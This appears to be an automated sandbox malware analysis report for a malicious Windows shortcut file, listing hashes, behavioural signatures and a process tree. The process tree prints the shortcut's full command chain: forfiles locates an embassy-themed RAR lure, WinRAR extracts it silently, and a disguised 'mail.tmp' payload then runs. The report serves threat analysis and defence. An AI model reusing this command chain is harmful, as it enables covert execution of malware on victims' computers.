Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
-
submitted
10/04/2024, 12:44
General
-
Target
94e76db201d4998394effae2c132730ff958bf6553f6dd08d0d5856ecb5e8a84.lnk
-
Size
2KB
-
MD5
3277b31aa055bc149af8c37699019586
-
SHA1
d0d6618fc79ffa3de2aec58603539a294a0bc203
-
SHA256
94e76db201d4998394effae2c132730ff958bf6553f6dd08d0d5856ecb5e8a84
-
SHA512
e7ef24dd982a79c5f155adcc552521fd466cdd80ff57ac0c0a88e2300761840b0ec3312da2bbc4f7ac1c9aa369bf38d3e6a7f3938eb03058fe6a340a168d8ebc
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\94e76db201d4998394effae2c132730ff958bf6553f6dd08d0d5856ecb5e8a84.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "`\`\`\`\`\`\mail.tmp||(forfiles /P C:\Users\Admin\AppData\Roaming\..\..\ /S /M ^"Embassy of the Republic of Suriname 2022-N-033.rar^" /C "cmd /c (c:\progra~1\winrar\winrar x -inul -o+ @path||c:\progra~2\winrar\winrar x -inul -o+ @path)&&`\`\`\`\`\`\mail.tmp")"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\forfiles.exeforfiles /P C:\Users\Admin\AppData\Roaming\..\..\ /S /M "Embassy of the Republic of Suriname 2022-N-033.rar" /C "cmd /c (c:\progra~1\winrar\winrar x -inul -o+ @path||c:\progra~2\winrar\winrar x -inul -o+ @path)&&`\`\`\`\`\`\mail.tmp"3⤵
-
-